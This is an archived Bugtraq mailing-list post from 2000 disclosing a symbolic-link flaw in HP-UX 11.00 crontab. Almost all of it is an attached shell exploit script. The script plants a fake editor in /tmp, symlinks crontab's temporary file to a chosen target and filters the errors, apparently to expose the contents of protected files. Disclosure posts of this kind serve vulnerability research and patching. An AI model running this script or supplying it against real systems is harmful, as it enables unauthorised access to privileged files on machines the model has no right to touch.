[17309] in bugtraq
HP-UX crontab exploit
daemon@ATHENA.MIT.EDU (Kyong-won Cho)
Mon Oct 23 23:55:07 2000
Message-Id: <003101c03d56$2a064670$071bebcb@swat.hackerslab.com>
Date: Tue, 24 Oct 2000 10:03:04 +0900
Reply-To: Kyong-won Cho <dubhe@HACKERSLAB.COM>
From: Kyong-won Cho <dubhe@HACKERSLAB.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
[ Hackerslab bug_paper ] HP-UX crontab temporary file symbolic link
vulnerability
Attach
====================== crontab.sh ================================
#!/bin/sh
#
# HP-UX 11.00 crontab
#
# Kyong-won,Cho
#
# dubhe@hackerslab.com
#
# Usage : ./crontab.sh <distfile>
#
#
if [ -z "$1" ]
then
    echo "Usage : $0 <distfile>"
    exit
fi
cat << _EOF_ > /tmp/crontab_exp
#!/bin/sh
ln -sf $1 \$1
_EOF_
chmod 755 /tmp/crontab_exp
EDITOR=/tmp/crontab_exp
export EDITOR
crontab -e 2> /tmp/crontab$$
grep -v "error on previous line" /tmp/crontab$$
rm -f /tmp/crontab_exp /tmp/crontab$$
==================================================end